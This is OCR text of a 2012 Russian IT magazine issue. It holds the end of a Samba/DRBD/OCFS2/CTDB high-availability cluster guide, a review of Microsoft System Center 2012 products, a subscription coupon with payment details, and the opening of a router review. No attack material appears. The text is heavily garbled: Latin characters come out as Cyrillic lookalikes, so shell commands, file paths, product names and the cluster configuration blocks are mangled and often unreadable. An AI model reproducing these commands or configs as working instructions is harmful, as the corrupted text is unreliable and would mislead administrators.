Сепега^іоп : 1362679229 
5І2е:2 

базб:© 1таз1:ег:0 
МазИ : 1 1таз1:ег:1 
Кесоѵегу тосІе:І\І(ЖМАІ_ (0) 

Кесоѵегу таз1:ег:0 

Также для проверки соединения можно устроить пинг СЮВ- 
хостов: 

# сТсІЬ ріп§ -п аіі 

гезропзе Тгот 0 1:іте=0. 000064 вес (3 сНеп'Ьз) 
гезропзе -Рпот 1 1:іте=0. 000087 зес (9 сИеп^з) 

Наконец запускаем демон ЗатЬа: 

# /еІіс/іпіІі.сІ/затЬа з'ЬапІ: 

Если при конфигурировании не было допущено ошибок, кла- 
стер уже должен быть готов к подключению клиентов. Со стороны 
ѴѴіпсІоѵѵз-клиентов кластер должен выглядеть как единое целое, то 
есть как один сервер хранения. В большинстве сред рабочего сто- 
ла для СІІМІХ картина будетта же. Однако если потребуется смон- 
тировать «диск» из командной строки, придется указать один из 
публичных ІР-адресов, прописанных в /еІс/сІсІЬ/риЫіс асІсІгеззез: 

# тоипі: -1: ^іТз //192. 168.0. 3/риЫіс \ 

/тпІі/затЬа -о изег=ЮЗЕР 

# зтЬсІіепІ: //192.168.0.4/риЫіс 

Не важно, какой из адресов использовать, — как я уже говорил, 
они оба будут доступны ровно до тех пор, пока в строю будет на- 
ходиться хотя бы один сервер. 



МОНИТОРИНГ И ВОССТАНОВЛЕНИЕ 



Просто собрать кластер - только начало, гораздо труднее зани- 
маться слежением за его состоянием и предотвращать отказы. 

К счастью, наша конфигурация всячески этому способствует и 
требует вмешательства, как правило, только на уровне реше- 
ния железных проблем, — остальные проблемы будут решены 
софтом самостоятельно. Как это работает? Представим себе 
ситуацию, когда один из узлов кластера выходит из строя. Как 
ведет себя система в этом случае? Первым под удар попадает 
наше ОПЕЮ-устройство, но благодаря режиму тазіег/ппазіег 
смерть одного из узлов никак не отразится на функциональ- 
ности другого. Поэтому недоступное устройство просто отклю- 
чается, а второй сервер продолжает функционировать. Второй 
компонент, реагирующий на смерть узла, это файловая система 
0СР52. Но и здесь все заканчивается достаточно благополучно 
благодаря встроенному механизму фенсинга (Еепсіпд), который 
просто отключает недоступную ноду от кластера и восстанав- 
ливает консистентность файловой системы с помощью отката 
незавершенных операций над файлами, проделанными со 
сбойного узла. При этом сам сбойный узел отправляется в пере- 
загрузку (если, конечно, он не умер окончательно). Следующим 
о смерти узла узнает демон СЮВ, работающий на живом узле. 
Однако, в отличие от двух предыдущих компонентов пирамиды, 
он поступает гораздо умнее. Он помечает мертвый узел флагом 
Ш\ІНЕАІ_ТНУ или 0І5С0ІМІМЕСТЕ0, назначает его ІР-адрес другому 
узлу и посылает всем его клиентам ТСР-пакет с нулевым номе- 
ром последовательности. Это вынуждает клиентов переуста- 
новить соединение с узлом, благодаря чему они автоматически 
перебрасываются на живой узел, даже не заметив подмены. 

Сам протокол СІР5 позволяет выполнить такой трюк, в резуль- 
тате чего задержка в обслуживании для клиентов составляет 
всего несколько секунд. Что делать в такой ситуации админу? 
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Неизменно высокая доступность 



"іаЬаІ { изаде-ссшлі по: > 
сомпоп { зупсег ( гаіе Ш0М: ) } 
гезаигсе г0 { 
ргоіосоі С; 
зіагіир < 

иГс-іітеоцІ 15; 
еІедг-шГс-!ітеоиі Б0; 

) 

леі 1 

а 1 Іей- Ішо-рг ішаг іез : 
аПег-зЬ-0рг і О ізсег Ц-гего-сГіапдез; 
аПег-зЬ-іргі сопдепзиз; 
а Н ег-зЬ-Зрг і і зсоппес 1 ; 
зЬагБЙ-ЗЕСгеІ "123"; 

сгаігЬтас-аІд зНаІ: 

} 

ап псгіеі ( 

йеѵісе /йеѵ/йгЬйѲ; 
йізк /йеѵ/зйЬ: 
асИгезз 10 0,0,1: 7700 ; 
теіа-сіізк іпіегпаі ; 

> 

оп погіе2 { 



/еіс/сІгЬсІ .сопГС+ПВО] 



сіиз^ег і 




гогіе.соипі = 2 
пап» = ссТь2 


пойе; 


ір_роп " 7777 
Ір_асМгезз = 192.168,0.1 
гштЬвг = 1 

паша = погіеі . с Іизівг . Іона 1 
сіизіег = осГз2 


псйв: 


ір рог! = 7777 
ір.аййгезз = 192, 168 .Ѳ. 2 




пілпрвг = 2 

пата = посІе2 .сіизіег . Іосаі 


К 

н 

пи 


сіизіег = осГз2 


/еІЕ/осТ^/с кі^іог .сапі 1 + 1 



гтш 

Если тебе 

потребуется собрать 
кластер из более чем 
двух машин, можно 
использовать любую 
распределенную 
ФС вроде Іизіге и 
ОІизІегРБ. 



№№№N6 



Чтобы БатЬа 
работала 

правильно, следует 
позаботиться 
об управлении 
учетными записями 
пользователей. 

В официальном 
руководстве 
подробно описано, 
как это сделать. 



Правим конфиг ОРЕЮ 



Правим конфиг 0СР52 



Да в общем-то ничего. Если сервер упал из-за ошибок в ПО или 
каких-то непреднамеренных действий со стороны третьих лиц 
(пропало питание, не сработал ІІР5 и так далее), то после пере- 
загрузки узел восстановит свое состояние автоматически. То же 
самое справедливо и в отношении поломки одного из внутрен- 
них компонентов сервера. Если же умер сам жесткий диск, то 
после его замены сервер достаточно просто ввести в строй. В 
большинстве случаев для этого понадобится выполнить всего 
две команды: 

# сІгЬсІасІт сгеаЕе-тсІ гѲ 

# сІгЬсІасІт а1:1:асИ гѲ 

Затем начнется синхронизация массива, по окончании которой 
можно вновь смонтировать раздел и перезапустить самбу и СЮВ: 

# тоипЕ /сіеѵ/сі пЬсІѲ 

# /еЕс/іпіЕ.сІ/сЕсІЬ гезЕагЕ 

# /еЕс/іпіЕ.сІ/затЬа гезЕагЕ 

Чтобы быть в курсе событий и вовремя реагировать на падение 
узлов, следует применять различные методы мониторинга, это мо- 
жет быть что угодно, начиная банальным пингом по крону и закан- 
чивая специализированными система типа топіС Мы уже не раз 
писали в ][ о мониторинге, поэтому я не буду рассказывать об этом 
подробно. Кстати, отслеживать ситуации с проблемами в работе 
СЮВ очень просто с помощью скрипта /еіс/сісі Ь/поіМ'у.зЬ, который 
выполняется в тех случаях, когда появляются проблемы в работе 
узла, и он отключается от СЮВ-кластера. Прописать в скрипт 
можно все что угодно, — например, отправку письма админу: 

# ѵі /еЕс/сЕсІЬ/поЕі-Ру. зИ 

еѵепЕ="$1" 

збіЕЕ 



сазе $еѵепЕ іп 
ипИеа1~ЕИу ) 



таіі -Роо@Ьаг -з /ЦбозЕпате' із ІІІМНЕАННУ" ... 
ІіеаІЕІіу) 

таіі -Роо@Ьаг -5 "^бозЕпате^ із НЕАІ_ТНѴ" ... 

3 3 

езас 

За состоянием СЮВ в режиме реального времени можно на- 
блюдать с помощью команды «сісІЬ зіаіиз». Три первых строки в ее 
выводе наиболее информативны, они отражают состояние узлов: 

• ОК — узел функционирует нормально; 

• 0І5С0МЫЕСТЕ0 — узел недоступен; 

• 0І5АВІ.Е0 — узел отключен администратором, однако он спосо- 
бен нормально функционировать; 

• Ш\ІНЕАІ_ТНѴ — существуют проблемы, мешающие подключить 
узел к кластеру, при этом сам демон СЮВ работает нормально; 

• ВАЫЫЕ0 — узел попал в бан из-за слишком большого количе- 
ства попыток восстановить работу, скорее всего проблема в 
неправильной настройке СЮВ; 

• ЗТОРРЕй — узел отключен от кластера, но принимает управ- 
ляющие команды; 

• РАРТІАи_ѴОІ\іиМЕ — узел работает, но недоступен из внешней 
сети. 

Также следует обратить внимание на строку Ресоѵегу тобе, от- 
ражающую режим работы кластера. Возможные значения: 

• ѵІ\І0РМАІ_ — кластер функционирует нормально. 

• РЕСОѴЕРУ — производится восстановление работы кластера, 
на время которого он недоступен. 

В любой момент узел можно отключить от кластера с помощью 
команды «сісІЬ бізаЫе» и вернуть с помощью «сісІЬ епаЫе». 



выводы 



Сегодня развернуть кластер высокой доступности не так уж и 
сложно. Как видишь, все что для этого требуется — несколько 
машин, пара жестких дисков и немного свободного времени. □С 
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Сергей Яремчук (дгіпсІег(д5упаск.ги) 



5УЫ/АСК 



ІТ-РЕШЕНИЯ ОТ 
МІСК050РТ: ОБЗОР 
ГЛАВНЫХ НОВИНОК 
2012 ГОДА 



В этом году корпорация МісгозоО: практически полностью 
обновитлинейки своих основных продуктов. Большие 
изменения ждут и популярное семейство инструментов 
управления Бузіет Сепіей, функции которого будут 
максимально адаптированы к современным реалиям. 
Учитывая, что все РС вышли точно в срок, а в ближайшее 
время станет доступен РТМ, сейчас уже вполне можно 
оценить нововведения. 
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Свежее дыхание 




В 5ССМ 2012 появилась роль Сепігаі Асітіпізігаііоп Бііе 



5У5ТЕМ СЕЫТЕР С0ЫРІ60РАТЮМ МАМА6ЕР 2012 



Первое, что бросается в глаза, это изменение списка продуктов, 
входящих в семейство Бузіет Сопіідигаііоп. Теперь он выглядит сле- 
дующим образом: Сопіідигаііоп Мападег, Орегаііопз Мападег, Бегѵісе 
Мападег, йаіа Ргоіесііоп Мападег ЮРМ), Ѵігіиаі МасЫпе Мападег 
(ѴММ), Огсбезігаіог и два новых продукта — Епфоіпі Ргоіесііоп 
(ранее Рогеігопі ЕР) и АррСопІгоІІег. Центральное место в линейке 
занимает БССМ 2012 (также известен какѵ.ІМехі), покрывающий 
практически полный цикл управления всей ИТ-инфраструктурой — 
установка ОС, приложений и обновлений, контроль конфигурации, 
инвентаризация софта и оборудования. Поэтому с него и начнем. 

Требования к системе БССМ 2012 немного изменились, те- 
перь только 64-битные ОС, его можно установить на ѴѴіп2к8/Р2 
с М55С1С2к85Р1 (х64) или позднее. Хотя точки распространения ЮР, 
ОізІгіЬиІіоп Роіпі) по-прежнему работают на х86 ѴѴіп. Так как измени- 
лась архитектура и логика работы, апгрейд со старых версий БССМ 
не предусмотрен. Для миграции с БССМ 2007 на БССМ 2012 пред- 
ложен мастер (Мідгаііоп -> Мідгаііоп ЭоЬз), который после запуска 
будетзадавать вопросы о коллекции, объектах и прочих специфи- 
ческих настройках. Внешне сам процесс выглядит довольно просто, 
в результате будут перенесены основные настройки, а также образы, 
обновления, драйвера и прочее. Правда, для этого необходимо будет 
полностью развернуть новую инфраструктуру, в том числе переуста- 
новить клиента, перенести ресурсы и по окончании процедуры 
выключить старые сервера. Конечно, некоторая часть данных в новой 
консоли потребует уточнения, — например, если пакеты хранились 
локально, понадобится указать новый путь, хотя для их размещения 
обычно используются общие ресурсы, так что особых проблем быть не 
должно. База инвентаризации не переносится, она будет заполнена 
новыми данными, поэтому не сохранится и история. 

В 5ССМ2012 интегрирована четвертая версия инструмента ми- 
грации учетных записей БІБМТ (БІзегБіаІе Мідгаііоп Тооікіі). Функция 
развертывания ОС ОБО (Орегаііпд Бузіет Оеріоутепі) всегда была 
одной из сильных сторон БССМ, с появлением иерархической модели 
(образы не привязаны к определенному сайту) нет необходимости 
в сохранении индивидуальных образов, существенно упрощена ра- 
бота с ѴѴІМ. Возможность РХЕ теперь поддерживается только точками 
распространения йР. Поддержка технологии Іпіеі ѵРго/АМТ позволяет 
получить доступ к железу, минуя ОС. Одной из целей разработчиков 
было уменьшение количества серверов, так как ранее из-за специфи- 
ческих настроек коллекции часто требовался еще один Ргітагу Бііе, 
в результате даже в небольшой организации серверов могло быть 
неприлично много. В иерархии появилась роль Сепігаі Асітіпізігаііоп 
Бііе (САБ, аналог Сепігаі Ргітагу Бііе), используемая только для 
управления иерархией и отчетов. 




Список ролей сайта БССМ 2012 также претерпел изменения 

Такой сайт не обслуживает клиентов и поддерживает ограниченное 
количество ролей (АІ, Боііѵѵаге Іірсіаіе Роіпі, Р5Р и 5НѴ). Но главное, 
в подчинении САБ может быть только один основной (Ргітагу) сайт, 
тогда как ранее поддерживалась вложенность нескольких Ргітагу. 
Бесопсіагу Бііе требуют наличия БОЕ-сервера (можно использовать бес- 
платный Ехргезз). Привычных режимов ІМаІіѵе и МіхесІ нет, теперь просто 
указываем режим работы по НТТР и/или НТТР5, как для сайта в целом, 
так и на ОізІгіЬиІіоп Роіпі. На разные коллекции можно назначать свои 
настройки. Клиент может перебирать между несколькими Мападетепі 
Роіпі внутри сайта и подключаться к доступному. Это, кстати, основные 
причины отказа от многочисленных Ргітагу сайтов, так кактакой подход 
упрощает структуру, да и уменьшает количество лицензий. Рерогііпд 
Роіпі теперь носит имя Рерогііпд Бегѵісез Роіпі и базируется на БОБ 
Рерогііпд Бегѵісез, поэтому не получится перенести настройки со старой 
системы. Точки ВгапсЬ йРуже нет кактаковой, БССМ 2012 использует 
технологию ВгасЬСасЬе. В БССМ 2012 реализована новая концепция, по- 
лучившая название БІСМ (БІзег Сепігіс Мападетепі), — такой подход сде- 
лал его более дружелюбным к пользователю, предлагая ему большие 
возможности по контролю и самостоятельному сопровождению системы 
(естественно, в рамках политик). Теперь именно пользователь выбирает 
приложения для установки и определяет, когда на компьютер будут за- 
гружаться обновления, указывая для этого рабочие часы в настройках. 
Ранее все было с точностью наоборот, — основной точкой управления 
был компьютер, пользователь оставался за кадром и решений никаких 
не принимал. Новый подход видится мне более правильным, поскольку 
администратор не всегда владеет ситуацией и ориентируется лишь на 
роль и группу. Кроме того, индивидуальные требования при большом 
количестве пользователей учитывать тяжело, а обновление, да еще 
с перезагрузкой, устанавливаемое в неподходящее время, может сильно 
помешать. Если за компьютером работает несколько пользователей, 
один из них назначается основным. Сами приложения разделены на 
обязательные и доступные (РедиігесІ или АѵаіІаЫе), также определяется 
тип установки (локальная, терминал, виртуальное Арр-Ѵ, ѴѴіпсІоѵѵз МоЬіІе 
САВ), зависимости и прочее. Для поиска АѵаіІаЫе приложений пользо- 



ПОДДЕРЖКА ТЕХНОЛОГИИ 
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Консоль управления 5ССМ 2012 выполнена в новом стиле 



вателям предложен 5о**ѵѵаге Сеп*ег, после выбора администратор может 
одобрить или блокироватьустановку. Приложение, в зависимости от 
конкретной ситуации (пользователь работает на ПК, терминале и так 
далее), можетустанавливаться по-разному. Например, на ПК это будет 
локальная установка, а с терминала — виртуальная. Устанавливаемые 
программы отслеживаются в узле Мопііогіпд, а не в 5*а*из Меззаде 
Ѵіеѵѵег, как в случае 5ССМ2007. При запуске мастера из СІіеп* Сизіогп 
Зеиіпдз администратор указывает, на кого распространяются настройки 

— для пользователя они или для компьютера. Многие администраторы 
перед развертыванием проверяют работу на тестовой группе, — теперь 
все установки из такой среды легко импортируются на рабочие станции. 
Интерфейс реализует рол евую модель управления доступом РоІе-ВазесІ 
Ассезз Сопігоі (РВАС), скрывая те настройки, которые недоступны поль- 
зователю. Во вкладке 5есигі*у Роіез можно найти 13 предустановленных 
ролей, при необходимости администратор может самостоятельно добав- 
лять новые, ориентируясь на бизнес-структуру компании. Сами объекты, 
коллекции, с которыми может работать роль, определяются в 5есигі*у 
5соре, а раздавать права можно на уровне коллекции, а не сайта. В 5ССМ 
2012 интерфейс консоли обновлен и выполнен в стиле М5 (Жісе, он со- 
стоит из так называемых ѴѴипсІегЬаг, содержащих ссылки на меню управ- 
ления, и уже не является ММС. Конечно, некоторое время приходится 
привыкать к расположению пунктов меню, но затем новый интерфейс 
находишь вполне удобным и логичным. Еще одно важное изменение, 

— на клиенте устанавливается специальная программа СІіеп* НеаШі 
(сстеѵаі.ехе), отправляющая по расписанию сообщение о его текущем 
состоянии и возвращающая его в рабочее состояние в случае проблем. 
Также 5ССМ 2012 получает некоторый функционал 5С АррСопІгоІІег, из- 
вестный под кодовым именем Сопсего (лат. «связывать»), позволяющий 
управлять 5аа5 услугами и приложениями в приватных облаках, по- 
строенных на ѴѴіпсІоѵѵз Зегѵег, Нурег-Ѵ и ѴігіиаІ МасЫпе Мападег2012, и в 
публичных облаках на базе ѴѴіпсІоѵѵз Агиге. Владельцы могут разверты- 
вать ѴМ, получать доступ к ресурсам, использовать несколько подписок 
ѴѴіпсІоѵѵз Агиге, копировать ѴЕЮ-образы. 



5Ѵ5ТЕМ СЕЫТЕР ОРЕРАТІСШЗ МАИАбЕР 2012 



Теперь ОрзМдг является основным инструментом для управления 
частным облаком, включая возможности мониторинга сетевых 
устройств и технологию контроля производительности приложений 
АѴІСобе. В частности, кроме серверов можно обнаруживать и отсле- 
живать маршрутизаторы, в том числе отдельные интерфейсы и порты, 
а также ѴІ_АІ\І (обнаруживаются автоматически). Поддерживает 
ЗІЧМРѵЗ, ІРѵ4/ІРѵ6, ведет статистику по трафику и скорости, осущест- 
вляет контроль работы протокола Н5РР и многое другое. 

В новой версии ОрзМдг все сервера управления стали равно- 
правными, то есть роли Роо* Мападетеп* Зегѵег больше нет, кон- 
фигурацию агентов вычисляет каждый Мападетеп* Зегѵег. Теперь 
с ОрзМдг 2012 вся инфраструктура не зависит от доступности одного 




5ССМ 2012 позволяет выполнять команды на *піх-системах 

единственного сервера. Хотя в целях обратной совместимости ввели 
специальную роль РМ5 Епгшіаіог. Чтобы справиться с нагрузкой, не 
обязательно строить кластер, — администраторы могут объединять 
серверы управления в группы и для НеаШп Зегѵісе создавать пул 
ресурсов (Резоигсе РооІ) из нескольких Мападетеп* Бегѵег. В обыч- 
ном режиме задачи выполняеттолько один из серверов пула, другие 
подхватывают его роль только в случае недоступности. Получается 
такой себе Раііоѵег Сіизіег без Раііоѵег Сіизіег. Во время установки 
по умолчанию создается три пула: Ай Аззідптеп* Резоигсе РооІ, 
МоІіЯсаІіопз Резоигсе РооІ и АП Мападетеп* Бегѵегз Резоигсе РооІ, 
остальные администратор может настроить самостоятельно. 

Для хранения данных вместо ОЗУ (как это было на РооІ М5 
и требовало мощного сервера) используется только БД. Консоль 
управления внешне изменилась мало, зато веб-консоль перерабо- 
тана существенно, но осваивается легко. Кроме ѴѴіпсІоѵѵз, полно- 
ценно ОрзМдг 2012 поддерживает Біпих и *піх. Уже сегодня доступны 
пакеты управления (Мападетеп* Раск) для поддержки популярных 
серверов приложений: АрасЬе Тотса*, ІВМ ѴѴеЬЗрЬеге, Заѵа ЕЕ, Огасіе 
ѴѴеЫодіс, РесІ На* ЗВозз и других. Обеспечивается диагностика и веб- 
приложений, созданных на базе .ІЧЕТ и 32ЕЕ и ѴѴіпсІоѵѵз Агиге. 

Доступный набор командлетов РоѵѵегЗЬеІІ (имя включает 5С0М/ 
5С) теперь дает возможность управлять в том числе и *піх-системами. 
Чтобы получить список всех командлетов, достаточно ввести: 

Р5> 6е1:-СоттапсІ -Мосіиіе ОрегаІііопзМапа^ег 

Пакетуправления ІЛЧІХ/Еіпих БЬеІІ СоттапсІ ТетрІа*е предлагает 
шаблоны, позволяющие создавать правила, задания и мониторы, 
используя команды оболочки непосредственно с панели ОрзМдг. 

В сравнении с ОрзМдг 2007 сам процесс настройки при помощи 
мастеров — упрост. В финальном релизе данный пакет будетуста- 
навливаться по умолчанию, для РС его нужно скачать и установить 
отдельно. 



МІСР050РТ ОЕРІ_ОѴМЕМТТООІ_КІТ 2012 



Главное нововведение в МйТ — улучшенная интеграция с 5ССМ 2012 
и Ай, а также поддержка йаРТ (йіадпозііс ап б Рераіг Тооікі*, входит 
в йезк*ор 0р*ітІ2а*іоп Раск). 

При этом МОТ2012 полностью вписывается в новую консоль 5ССМ 
2012 (может работать и с 5ССМ2007) и понимает измененную модель 
приложений (терминальные, виртуальные и так далее). Собствен- 
но, процесс работы с МйТ мало изменился, отличия в интерфейсе 
практически не бросаются в глаза. В настройках появились два новых 
Тазк Зедиепсез: йеріоуіо ѴЕЮ СІіеп* Тазк Зедиепсе и РерІоу*о ѴЕЮ 
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Свежее дыхание 




гтш 

• Обзор 
возможностей 
5ССМ2007 ищи в ][ 
08.09/09.09/01.10. 

• Установка 

и настройка 5С0М 
2007 описана в ][ 
08.11. 

• Процесс 

развертывания РЕР 
2007 освещен в] 
[09.11. 

• Подробно о работе 
с МОТ 2010 читай в ][ 
10.09. 



• Страница БССМ 

2012: сІск.ги/еМЗТ. 

• Страница МОТ 2012: 

тісгозоН.сот/тсИ. 



Настройка сканирования 5С Епсіроіпі Ргоіесііоп 2012 



Зегѵег Тазк Зециепсе (развертывать ѴйІ, клиентский ПК или сервер). 
Конечно, при помощи МОТ 2010 также было возможно произвести 
Р2Ѵ миграцию, задействуя Зузіпіегпаі 0ізк2ѴН0 (на ТесЬЫеІ доступна 
инструкция сІск.гиЛООр ), но процесс не совсем тривиален и не всем 
понятен. Теперь это стандартная операция, все настройки которой 
выполняются за несколько кликов мышкой. Также заявлено, что 
МОТ 2012 будет поддерживать грядущую ОС ѴѴіп8. Используемый для 
редактирования установок в М0Т_Р0ЮЕР/5сгірІ5/ІЮІѴѴІ2агсІ_Соп1 : ід. 
хті инструмент ІЮІ йезідпег (ІІзег-Огіѵеп Іпзіаііаііоп, появился 
в МТО20Ю Еірсіаіе 1) получил новый интерфейс и возможности. Так 
вместо двух сценариев из коробки теперь их три: Ыеѵѵ Сотриіег, 
РеігезЬ и Реріасе. Администратор может просмотреть список всех 
сценариев в одном окне и изменить расположение простым перета- 
скиванием. Сам мастер расширяем, хотя процесс не совсем прост (на 
ТесЬЫеІ приводится пример кода). Аеще — усовершенствован мастер 
І_іІе ТоисЬ, улучшена миграция учетной записи, реализована полная 
поддержка ѴѴіпРЕ. Все задачи можно решить при помощи РоѵѵегЗЬеІІ. 
Поддержка старых ОС ѴѴіпХР и ѴѴіп2кЗ сохранена. 



НОВОЕ В М5 ВОЕ 5ЕРѴЕР 2012 ЮЕМАИ) 



Вероятно, ЗОЕ Зегѵег'у будет принадлежать первенство в линей- 
ке обновлений 2012, так как его выход планируется уже весной. 



Нововведений очень много, и они затронули все без исключения 
подкомпоненты сервера. Одни направлены на повышение произво- 
дительности и доступности, другие позволили расширить кругзадач. 
К слову, в тестировании СТР-версии участвовало более 100 000 поль- 
зователей, которые высказали свое мнение по поводу исправлений. 
Приведем лишь некоторые, наиболее важные. 

Сисадмины наверняка оценят поддержку установки на ѴѴіп2к8Р2 
в режиме Зегѵег Соге: теперь для развертывания ЗОБ-сервера не тре- 
буется графическая оболочка. Представлено несколько инструментов 
миграции: ЕІрдгасІе Асіѵізог, ОізІгіЬиІесІ Реріау и Мідгаііоп Аззізіапі 
(55МА). Базирующаяся на концепции групп доступности (АѵаіІаЬіІіТу 
(Згоирз) технология НАйР (Нідб-АѵаіІаЬіІіІу апсі йізазіег Ресоѵегу) 
позволяет повысить доступность экземпляров ЗОБ Зегѵег за счет 
дополнительных копий БД. Такие копии могут работать в режиме 
«только чтение» и использоваться, например, для отчетов, что снимет 
нагрузку с рабочей БД. 

Реализована поддержка кластера на разных подсетях (ЗОБ 
Зегѵег МиШ-ЗиЬпеІ Сіизіегіпд). Для очистки дубликатов в данных 
предложен новый компонент Оаіа Оиаіііу Зегѵісез. Инструменты 
управления позволяют эффективно манипулировать произво- 
дительностью в такой многопользовательской среде как частное 
облако. Новый компонент Роѵѵег Ѵіеѵѵ (СгезсепД с богатыми воз- 
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АррСопІгоІІег позволяетуправлять сервисами внутри облака 

можностями представления информации для анализа позволяет 
пользователям самостоятельно строить отчеты на основе ВІ5М 
(Визіпезз I піеі Іідепсе Бетапііс МосІеІ). Семантическая модель 
бизнес-аналитики ВІ5М объединяет в себе модели данных ІЮМ 
и табличную РоѵѵегРіѵоЕ Улучшены механизмы полнотекстового 
поиска: по отдельным свойствам через ІРіІІег, и ЫЕАР, позволяю- 
щий указать порядок следования слов и расстояние. Добавлены 
новые разрешения и механизм пользовательских серверных 
ролей, добавлена поддержка 5НА2 256/512. Также предложена БОБ 
Ехргезз І_осаЮВ - легковесная версия БД с поддержкой всех функ- 
ций, не требующая конфигурирования и прав администратора. 



АРРСОИТРОІ-І-ЕР 2012 



АррСопІгоІІег 2012 — новое решение в семействе Бузіепп 
Сепіег, предназначено для контроля приложений внутри об- 
лака (публичного и частного), развертывания и управления 
сервисами. Это единый интерфейс ко всем ЦОД и Агиге. По 



сути, АррСопІгоІІег призван дополнить все имеющиеся сегодня 
инструменты, с которыми приходится иметь дело администра- 
тору: 5СѴММ, 55Р (Ѵігіиа I МасЫпе Мападег БеИ'-Бегѵісе Рогіаі 
или Боіиііоп Ассеіегаіог), йОТК Шупатіс Оаіасепіег Тооікіі) 
и консоль Агиге РІаНюгт. Ар рСопІгоІ Іег позволяет владельцам 
приложений создавать ресурсы с использованием шаблонов 
и библиотек, управлять ими, отслеживать активности, выпол- 
нять журналирование всех действий и многое другое. Например, 
разворачивать приложения могут сами менеджеры подразделе- 
ний, а ИТ-персонал просто контролирует этот процесс. Каждый 
пользователь получает веб-интерфейс, где будут доступны только 
определенные (в зависимости от его роли) функции. 



ЗАКЛЮЧЕНИЕ 



Большая часть изменений носит позитивный характер, поскольку по- 
зволяетупростить работу как админу, так и пользователям. Осталось 
дождаться финальных релизов. ПЕ 



ЛИЦЕНЗИРОВАНИЕ ЛИНЕЙКИ БУБТЕМ СЕІМТЕК 2012 



Модель лицензирования всех продуктов линейки Бузіет Сеп- 
*ег 2012 полностью изменилась (подробнее ск. ги/е РЦ N 1. она не 
привязывается к решению и оптимизирована под использование 
в рам кахргіѵаіесіоисі. Теперь все лицензии в ключа ют в себя 
право на использование всего функционала всех продуктов 
линейки. Другими словами, отдельные лицензии на продукты 
исчезли, и нет ограничений по возможностям. При этом консоли 
управления уже не требуют лицензии. Хотя одно ограничение 
все же есть — каждая лицензия покрывает 2 физических С РБІ. 
Доступны лишь два варианта: БуБІет Сепіег 2012 Бѣапсіагсі и Оаіа- 
сепіег, которые отличаются лицензированием виртуальных сред. 



Первая позволяет управлять только двумя виртуальными ОС (на 
частном или публичном облаке), у второй ограничения отсутствуют. 
Причем в пакет лицензий уже включены права на использование 
серверов управления и БОБ Бегѵег, - отдельно их покупать тоже не 
потребуется. 

Суммарно стоимость лицензии выросла, но она нивелируется 
за счеттого, что в нее включены лицензии на подкомпоненты. 
Клиентские лицензии по-прежнему требуются, но теперь они также 
объединены и будут доступны в рамках набора 5у5іепл Сепіег СІіеп* 
МБ Биііе, в который входят лицензиидляБегѵісе Мападег, ОрегаНопз 
Мападег, Оаіа РгоІесНоп Мападег и ОгсИезігаіог. Отдельно доступны 
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Подписка 



ГОДОВАЯ 
ЭКОНОМИЯ 

500 руб 



1. Разборчиво заполни подписной купон и кви- 
танцию, вырезав их из журнала, сделав ксе- 
рокопию или распечатав с сайта зЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• на е-таіі: зиЬзсгіЬеОдІс.ги; 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 1 15280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 

5 эт., офис № 21, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ 
ОПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ 
МОЖНО ОФОРМИТЬ С НОЯБРЯ. 



12 НОМЕРОВ — 2200 РУБ. 

6 НОМЕРОВ — 1260 РУБ. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ 
ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ! 




ПРИ ПОДПИСКЕ 
НА КОМПЛЕКТ ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 ОѴО: — 

ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 
ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 



ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА 
ЗА СЧЕТ ИЗДАТЕЛЯ, В ТОМ ЧИСЛЕ КУРЬЕРОМ 
ПО МОСКВЕ В ПРЕДЕЛАХ МКАД 



ЕСТЬ ВОПРОСЫ? Пиши на піоісідіс.ги или звони по бесплатным телефо- 
нам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3-999 (для жителей 
других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 201 г. 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2012 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2012 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 




ТЕСТИРОВАНИЕ ТОПОВЫХ 
РОУТЕРОВ 



еспроводной маршрутизатор - это не просто коробочка, 
в которую можно «воткнуть интернет» и раздавать его 
по проводам и воздуху. Такие устройства таят в себе 
множество интересных функций, о которых ты можешь даже и не 
догадываться. В этом обзоре мы собрали самые производитель- 
ные бытовые роутеры от известных компаний. Итак, втыкай свой 
патчкорд, - поехали! 

МЕТОДИКА ТЕСТИРОВАНИЯ 

